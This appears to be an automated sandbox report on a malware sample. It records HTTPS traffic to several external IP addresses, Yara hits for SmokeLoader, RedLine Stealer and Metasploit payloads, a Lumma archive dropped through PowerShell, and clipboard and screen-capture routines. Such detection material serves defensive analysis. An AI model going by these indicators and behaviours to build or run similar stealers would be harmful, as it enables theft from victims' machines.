                  Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                  Source: unknownHTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.4:49755 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49756 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49758 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49762 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.0.235.84:443 -> 192.168.2.4:49761 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49764 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49769 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49772 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.4:49774 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49776 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49777 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49778 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49779 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.4:49780 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49781 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49783 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49784 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49785 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49786 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49787 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49788 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49789 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49790 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49791 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49792 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49793 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49794 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49795 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49796 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49797 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49798 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49799 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49800 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49801 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 192.168.2.4:49801 -> 167.235.128.153:443 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49802 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49803 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49804 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49805 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49806 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49807 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49808 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49809 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49810 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49811 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49812 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49813 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49814 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49815 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49816 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49817 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49818 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49820 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49821 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 192.168.2.4:49821 -> 107.173.160.137:443 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49822 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49824 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49825 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49826 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49828 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49829 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49831 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49832 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49833 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49835 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49836 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49837 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49838 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49840 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49841 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49842 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49844 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49845 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49846 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49848 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49849 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49850 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49852 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49853 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49855 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49856 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49857 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49859 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49860 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49862 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49863 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49864 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49866 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49867 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49868 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49870 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49871 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49873 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49874 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49875 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49877 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49878 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49880 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.4:49881 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.4:49882 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.4:49884 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Yara detected SmokeLoader
                  Source: Yara matchFile source: 00000005.00000002.2008625039.0000000002510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1766138054.00000000041B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2008687958.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1765878956.00000000026F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_0020ED00 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,13_2_0020ED00
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_0020ED00 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,13_2_0020ED00
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_0020FB2F GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,13_2_0020FB2F

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Reads the Security eventlog
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Reads the System eventlog
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 00000005.00000002.2008625039.0000000002510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000000.00000002.1766138054.00000000041B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000005.00000002.2008845370.00000000026EE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000005.00000002.2008687958.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000000.00000002.1765840803.00000000026E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000002.1765878956.00000000026F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000005.00000002.2008604231.0000000002500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000008.00000002.2594891132.000000C0005E8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                  Source: 00000000.00000002.1766013823.000000000272D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000008.00000003.2544868852.000000C0005E8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                  Found suspicious ZIP file
                  Source: lumma.zip.14.drZip Entry: run.bat
                  Powershell drops PE file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dllJump to dropped file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeJump to dropped file
                  Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401513 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401513
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402FD3 RtlCreateUserThread,NtTerminateProcess,0_2_00402FD3
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040267C NtEnumerateKey,0_2_0040267C
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004020C4 LocalAlloc,NtQuerySystemInformation,0_2_004020C4
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004026DC NtClose,0_2_004026DC
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004020E3 LocalAlloc,NtQuerySystemInformation,0_2_004020E3
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004020E7 LocalAlloc,NtQuerySystemInformation,0_2_004020E7
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004020FC LocalAlloc,NtQuerySystemInformation,0_2_004020FC
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402285 NtQuerySystemInformation,0_2_00402285
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004020B6 LocalAlloc,NtQuerySystemInformation,0_2_004020B6
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004020B8 LocalAlloc,NtQuerySystemInformation,0_2_004020B8
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403149 RtlCreateUserThread,NtTerminateProcess,0_2_00403149
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401553
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403303 NtTerminateProcess,GetModuleHandleA,CreateFileW,GetForegroundWindow,wcsstr,0_2_00403303
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040151E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040151E
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004025DD NtOpenKey,0_2_004025DD
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_00401513 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401513
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_00402FD3 RtlCreateUserThread,NtTerminateProcess,5_2_00402FD3
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_0040267C NtEnumerateKey,5_2_0040267C
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_004020C4 LocalAlloc,NtQuerySystemInformation,5_2_004020C4
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_004026DC NtClose,5_2_004026DC
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_004020E3 LocalAlloc,NtQuerySystemInformation,5_2_004020E3
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_004020E7 LocalAlloc,NtQuerySystemInformation,5_2_004020E7
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_004020FC LocalAlloc,NtQuerySystemInformation,5_2_004020FC
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_00402285 NtQuerySystemInformation,5_2_00402285
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_004020B6 LocalAlloc,NtQuerySystemInformation,5_2_004020B6
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_004020B8 LocalAlloc,NtQuerySystemInformation,5_2_004020B8
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_00403149 RtlCreateUserThread,NtTerminateProcess,5_2_00403149
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401553
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_00403303 NtTerminateProcess,GetModuleHandleA,CreateFileW,GetForegroundWindow,wcsstr,towlower,5_2_00403303
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_0040151E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_0040151E
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_004025DD NtOpenKey,5_2_004025DD
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC376900 RtlAllocateHeap,RtlAllocateHeap,NtQuerySystemInformation,6_2_00007FF6CC376900
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC394FC0 NtReadVirtualMemory,6_2_00007FF6CC394FC0
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3959D0 NtProtectVirtualMemory,6_2_00007FF6CC3959D0
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC395260 NtAllocateVirtualMemory,6_2_00007FF6CC395260
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC395100 NtWriteVirtualMemory,6_2_00007FF6CC395100
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC393F30 NtQueryInformationProcess,6_2_00007FF6CC393F30
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC34E8106_2_00007FF6CC34E810
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC395B806_2_00007FF6CC395B80
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC39898B6_2_00007FF6CC39898B
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC35D3906_2_00007FF6CC35D390
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC34D7A06_2_00007FF6CC34D7A0
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3743B06_2_00007FF6CC3743B0
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3A5D406_2_00007FF6CC3A5D40
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3607406_2_00007FF6CC360740
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3731506_2_00007FF6CC373150
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3795506_2_00007FF6CC379550
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC387D606_2_00007FF6CC387D60
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3B6B706_2_00007FF6CC3B6B70
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3943706_2_00007FF6CC394370
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC38F3706_2_00007FF6CC38F370
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC33FB706_2_00007FF6CC33FB70
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC33C4006_2_00007FF6CC33C400
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3470006_2_00007FF6CC347000
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC33BC006_2_00007FF6CC33BC00
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC354E006_2_00007FF6CC354E00
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3920106_2_00007FF6CC392010
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC388C106_2_00007FF6CC388C10
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3A4E106_2_00007FF6CC3A4E10
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC35FC106_2_00007FF6CC35FC10
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC38B0206_2_00007FF6CC38B020
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3AC2306_2_00007FF6CC3AC230
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC38E4306_2_00007FF6CC38E430
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC343E306_2_00007FF6CC343E30
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3698306_2_00007FF6CC369830
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3757C06_2_00007FF6CC3757C0
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3ADFD06_2_00007FF6CC3ADFD0
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC35A9D06_2_00007FF6CC35A9D0
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC376DE06_2_00007FF6CC376DE0
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3629E06_2_00007FF6CC3629E0
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3B49F06_2_00007FF6CC3B49F0
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC344BF06_2_00007FF6CC344BF0
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC386DF06_2_00007FF6CC386DF0
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3811F06_2_00007FF6CC3811F0
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC34CFF06_2_00007FF6CC34CFF0
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC383E806_2_00007FF6CC383E80
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3820806_2_00007FF6CC382080
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3618806_2_00007FF6CC361880
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3364A06_2_00007FF6CC3364A0
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC35B6A06_2_00007FF6CC35B6A0
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3B8AB06_2_00007FF6CC3B8AB0
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC37B6B06_2_00007FF6CC37B6B0
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC34BAB06_2_00007FF6CC34BAB0
